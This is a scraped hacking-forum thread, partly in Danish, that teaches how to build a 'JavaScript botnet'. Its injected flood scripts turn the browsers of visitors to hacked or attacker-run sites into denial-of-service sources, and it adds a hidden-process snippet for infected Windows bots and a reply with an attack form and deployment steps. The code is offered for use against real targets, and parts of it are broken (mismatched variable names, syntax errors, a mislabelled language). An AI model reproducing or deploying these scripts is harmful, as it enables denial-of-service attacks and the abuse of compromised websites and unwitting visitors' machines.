Shellsec

Fuld version: Javascript botnet
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.
Introduktion:
Hej. Da jeg bedre kan formulere og forklare mig på engelsk - har jeg valgt at skrive hele tråden om på engelsk. Det må i leve med.

Welcome to my thread, I will introduce you all into making a simple but stable javascript botnet that can perform a dos attack. The dos attack can be very strong if you have a good amount of traffic being sent to the javascript botnet when it is up and running.

Now to the setup part...

This is very easy to setup. All you have to do is to copy and paste the first code into your editor/complier and save it in the proper extension (JS).
When instructions are followed you can upload your script to your hacked webhost or your own webhost, then you can use your traffic as your power source.
Imagine you the power of this, if you hack a host with domains with lots of traffic and put up your arbitrary file (JS-file) on the webhost and then you will have a very powerful attack source and since the code is small and easy configured.
You will always be able to receive heck lots of traffic and change the target on your "small" but powerful botnet used to perform DOS attacks. All you need is traffic, no more scanning / exploiting / bruting...

function jsflood() {
var HOST = 'target.com'
var URI = '/'
var img = new Image()
var rand = Math.floor(Math.random() * 1000)
img.src = 'http://'+TARGET+URI+'?keywords='+rand+"=Javascript botnet"
}

setInterval(jsflood, 0)

The script below is a script I've wrote quickly. It was written in VB.
If you don't have any experience in hacking and can't obtain any traffic or find any reliable traffic sources or just want to get more traffic, then this is good for you.
When you have your domain and host up and running then you can use your windows bots as traffic. Basically you put this into your console application and build it and run it on your bots and ABRACADABRA !

Complie and run...
Process proc = new Process();
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.CreateNoWindow = true;
proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.start("trafikmodtageneside.dk")
proc.StartInfo.RedirectStandardError = false;
proc.StartInfo.RedirectStandardOutput = false;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.CreateNoWindow = true;
proc.Start();
proc.WaitForExit();
Jeg har brug din kode og lavet nogle modifikationer og jeg har skrevet et index hvor du kan ændre det 'mål' du vil angribe istedet for at skulle redigere i selve koden hver gang du vil angribe et nyt mål. Jeg syntes det er et fedt budskab denne tråd bringer og jeg vil begynde at læse mere om javascript botnet's da jeg tænker det kan være virkeligt effektivt.

Jeg føler dette er et bedre alternativ?

Index.html
Kode:
<title></title>
<script src="/attack/flood.js">
<form name="input" action="attack.php" method="POST">
    <input type="text" name="target" id="target" placeholder="target" >
    <input id="submit" name="submit" type="submit" value="Attack" ">
</form>

Flood.js
Kode:
function main(){
  if (target.length > 24)
   var HOST = document.getElementByid('target');
   var URI = '/favicon.ico'
   var img = new Image()
   var rand = Math.floor(Math.random() * 1000)
   img.src = 'http://'+TARGET+URI+'?keywords='+rand+"={love}"
}
setInterval(main, 0)

Instruktioner for installation:
1) Upload index.html til din server
2) Lav en mappe som hedder attack
3) Upload din javascript-fil inde i attack mappen og kald filen flood.js
4) Så kør din webserver og få folk til at besøge siden for at styrke dit net :)